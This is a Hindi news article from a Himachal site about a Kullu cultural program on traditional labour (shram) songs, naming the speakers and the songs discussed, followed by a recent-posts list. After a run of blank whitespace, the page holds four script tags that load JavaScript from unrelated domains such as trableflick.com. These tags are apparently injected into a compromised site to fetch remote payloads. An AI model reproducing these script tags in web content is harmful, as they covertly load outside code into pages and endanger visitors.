Categories: हिमाचल

कुल्लू के श्रम गीतों पर परिचर्चा एवं गायन

<p>जिला कुल्लू में हर विधा के लोक गीत प्रचलित हैं। संयोग और वियोग गीत, घटना प्रधान गीत, वीर रस गीत, संस्कार गीत आदि। गांव में हर कार्य संयुक्त रूप से किया जाता है। एक-दूसरे के काम में हाथ बंटाने का कार्य पुण्य माना जाता है। जंगल से लकड़ी लाना, लकड़ी की कटाई, फसल की बिजाई, घास की कटाई, धान की रोपाई आदि अनेक ऐसे काम हैं। जो ग्रामीण एक-दूसरे की सहायता से करते हैं। इस प्रकार के श्रम युक्त कार्य को लोग हंसी-खुशी से ढोल, नगारे एवं गायन के साथ करते है। श्रम गीत गाए जाते हैं।</p>

<p>इसी कड़ी में भाषा एवं संस्कृति विभाग जिला कुल्लू द्वारा श्रमगीतों पर परिचर्चा एवं गायन कार्यक्रम का आयोजन किया गया। कार्यक्रम की अध्यक्षता छेंरिग दोरजे जी ने की। उन्होंने कहा कि कुल्लू और लाहौल में समान रूप से श्रम गीत गाए जाते रहे हैं। दूसरे सत्र में कवि सम्मेलन का आयोजन किया गया। इसमें डॉ सूरत, डॉ दयानन्द गौतम, छेरिंग दोरजे, हीरा लाल, आई. एस. चांदनी, श्री शेरसिंह राणा, दीपक कुल्लवी, धनेश गौतम, सरला चम्बयाल, बालक राम, सत्यपाल भटनार, जयदेव विद्रोही, भगवान प्रकाश, शेर सिंह, प्रताप सिंह, टीकम राम, फिरासत खान, शिव चन्द पॉल, इन्दु भारद्वाज, हीरा लाल अदि ने चर्चा एवं गायन में भाग लिया। डॉ सूरत ठाकुर ने कहा कि कुल्लू में सामूहिक रूप से बड़े-बड़े कार्यों को निपटाने की परम्परा रही है। ये सामूहिक रूप से वाद्ययन्त्रों की धुन के साथ गीत गाते हुए किए जाते हैं। इन गीतों में हेसरू गीत, गूघती गीत, हाउली गीत आदि प्रमुख है। हीरा लाल ठाकुर ने कहा कि धान रोपते हुए भी महिलाएं श्रम गीत गाती हैं। इससे कार्य करते हुए मनोरंजन भी होता है। डॉ दयानन्द गौतम जी ने बताया कि शारीरिक श्रम से संबंधित गीत श्रम गीत कहलाते हैं। ये गीत कई तरह के कार्यों से जुड़ हुए होते थे।</p>

<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580122985408″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

21 mins ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

35 mins ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

42 mins ago

मंडी में हिमाचल ग्रामीण बैंक कर्मचारियों का विरोध प्रदर्शन, मांगों को लेकर गरजे

  Mandi: हिमाचल ग्रामीण बैंक कर्मचारियों द्वारा विभिन्न मांगों को लेकर सोमवार को हिमाचल प्रदेश…

47 mins ago

कांगड़ा बनेगा वल्चर सेफ जोन, गिद्धों के संरक्षण की पहल

Hamirpur: कांगड़ा जिले में गिद्धों के 506 नए घोंसले मिलने के बाद इसे वल्चर सेफ…

58 mins ago

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

4 hours ago